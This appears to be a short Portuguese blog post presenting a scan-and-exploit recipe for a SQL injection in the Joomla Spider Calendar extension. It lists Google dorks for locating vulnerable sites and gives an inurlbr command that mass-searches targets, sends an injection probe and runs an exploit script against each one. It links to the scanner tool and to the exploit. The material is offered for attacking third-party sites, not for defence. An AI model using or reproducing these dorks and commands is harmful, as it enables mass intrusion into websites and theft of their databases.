0xSCAN + EXPLOIT
----------------------------------------------------------------------------------------------------------
0x[+] Exploit Author : Claudio Viviani
0x[+] Vendor Homepage : http://web-dorado.com/
0x[+] Software: http://extensions.joomla.org/extensions/calendars-a-events/events/events-calendars/22329
Date : 2014-08-31
0x[+] Tested on : Windows 7 / Mozilla Firefox
Linux / Mozilla Firefox
------------------------------------------------------------------------------------------------
0xDORK[0]: inurl:option=com_spidercalendar
0xDORK[1]: intext:com_spidercalendar & intext:"index of"
0xDORK[2]: inurl:php & inurl:com_spidercalendar
0xVÍDEO[0]
0xVÍDEO[1]
0xCOMANDO INURLBR EXEMPLO={
./inurlbr.php --dork 'inurl:index.php?option=com_spidercalendar' -s joomla.txt -q 1,6 -t 3 --exploit-get "/index.php?option=com_spidercalendar&calendar_id=1'0x27" --command-vul "python exploit/Joomla/joomla-calendar.py -H http://_TARGET_/"
}
0xSCRIPT INURLBR = {
https://github.com/googleinurl/SCANNER-INURLBR
}
0xEXPLOIT Joomla Plugin Calendar = {
http://1337day.com/exploit/22603
}
Nenhum comentário:
Postar um comentário
............